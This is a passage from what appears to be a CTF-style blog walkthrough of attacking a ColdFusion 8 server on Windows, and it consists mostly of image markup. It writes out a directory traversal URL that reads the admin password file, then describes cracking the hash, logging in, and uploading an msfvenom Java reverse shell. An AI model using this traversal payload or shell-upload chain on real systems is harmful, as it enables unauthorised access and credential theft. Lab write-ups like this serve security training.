https://substackcdn.com/image/fetch/$s_!Oirv!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png 1272w, https://substackcdn.com/image/fetch/$s_!Oirv!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Oirv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Oirv!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png 424w, https://substackcdn.com/image/fetch/$s_!Oirv!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png 848w, https://substackcdn.com/image/fetch/$s_!Oirv!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png 1272w, https://substackcdn.com/image/fetch/$s_!Oirv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55a8b977-8a6e-41c6-a78c-bb1abd97c493_800x384.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><a href="https://www.exploit-db.com/exploits/14641">This entry</a> says that if we manipulate the login page to <em>http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en, </em>we can perform directory traversal and possibly read other files. Hmmm. This could work to gain access to /etc/passwd and /etc/shadow if this were a Linux machine, but it is Windows. Let&#8217;s see what the string included gives us.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Rej9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Rej9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png 424w, https://substackcdn.com/image/fetch/$s_!Rej9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png 848w, https://substackcdn.com/image/fetch/$s_!Rej9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png 1272w, https://substackcdn.com/image/fetch/$s_!Rej9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Rej9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Rej9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png 424w, https://substackcdn.com/image/fetch/$s_!Rej9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png 848w, https://substackcdn.com/image/fetch/$s_!Rej9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png 1272w, https://substackcdn.com/image/fetch/$s_!Rej9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9a26b6c4-22e8-460c-ad51-6bcfcf97cd0f_800x490.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>I like to use <a href="https://crackstation.net/">Crackstation</a> to attempt password cracking, so let&#8217;s try that.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ffWD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ffWD!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png 424w, https://substackcdn.com/image/fetch/$s_!ffWD!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png 848w, https://substackcdn.com/image/fetch/$s_!ffWD!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png 1272w, https://substackcdn.com/image/fetch/$s_!ffWD!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ffWD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ffWD!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png 424w, https://substackcdn.com/image/fetch/$s_!ffWD!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png 848w, https://substackcdn.com/image/fetch/$s_!ffWD!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png 1272w, https://substackcdn.com/image/fetch/$s_!ffWD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3bce468d-05b4-4920-b7bb-97fc3aa3648c_800x443.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>BOOM!</p><p>Let&#8217;s login and take a look around to see what there is to see. Since this is for pwnage, let&#8217;s look for opportunities to upload files.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zLGI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zLGI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png 424w, https://substackcdn.com/image/fetch/$s_!zLGI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png 848w, https://substackcdn.com/image/fetch/$s_!zLGI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png 1272w, https://substackcdn.com/image/fetch/$s_!zLGI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zLGI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/9225866c-89b7-4eec-a965-585cf581f764_800x516.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!zLGI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png 424w, https://substackcdn.com/image/fetch/$s_!zLGI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png 848w, https://substackcdn.com/image/fetch/$s_!zLGI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png 1272w, https://substackcdn.com/image/fetch/$s_!zLGI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9225866c-89b7-4eec-a965-585cf581f764_800x516.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Now we know where and how to upload files, what kind of shell do we use? We should probably take a look at what ColdFusion is written in. I was a bit lazy, but I validated through Wikipedia (this is not a peer-reviewed, academic paper). Java. Hmmmm&#8230;.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!pf7t!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!pf7t!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png 424w, https://substackcdn.com/image/fetch/$s_!pf7t!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png 848w, https://substackcdn.com/image/fetch/$s_!pf7t!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png 1272w, https://substackcdn.com/image/fetch/$s_!pf7t!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!pf7t!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!pf7t!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png 424w, https://substackcdn.com/image/fetch/$s_!pf7t!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png 848w, https://substackcdn.com/image/fetch/$s_!pf7t!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png 1272w, https://substackcdn.com/image/fetch/$s_!pf7t!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f8b6d75-8fc5-4888-bcf0-75837715133d_800x392.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>We could use the built-in shells from Kali, or we could make our own. I am feeling adventurous, let&#8217;s make our own file in msfvenom. First, let&#8217;s see what is available for Java.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BETP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BETP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png 424w, https://substackcdn.com/image/fetch/$s_!BETP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png 848w, https://substackcdn.com/image/fetch/$s_!BETP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png 1272w, https://substackcdn.com/image/fetch/$s_!BETP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BETP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/ebd14021-4d21-403b-bc11-7ba50b05d400_800x107.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BETP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png 424w, https://substackcdn.com/image/fetch/$s_!BETP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png 848w, https://substackcdn.com/image/fetch/$s_!BETP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png 1272w, https://substackcdn.com/image/fetch/$s_!BETP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Febd14021-4d21-403b-bc11-7ba50b05d400_800x107.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Ahhh. There is some Java. I like to use Teenage Mutant Ninja Turtle names for shells. Let&#8217;s go with Don, short for Donatello.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Z3KV!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Z3KV!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png 424w, https://substackcdn.com/image/fetch/$s_!Z3KV!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png 848w, https://substackcdn.com/image/fetch/$s_!Z3KV!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png 1272w, https://substackcdn.com/image/fetch/$s_!Z3KV!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Z3KV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Z3KV!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png 424w, https://substackcdn.com/image/fetch/$s_!Z3KV!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png 848w, https://substackcdn.com/image/fetch/$s_!Z3KV!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png 1272w, https://substackcdn.com/image/fetch/$s_!Z3KV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F07a4ff33-3b4a-4191-bbaf-39f7f6e61f2a_800x28.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s upload it and prepare for execution.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!yNo5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!yNo5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F47a64f88-fc9b-4c0b-b33f-5de16bd8e092_800x619.png 424w, 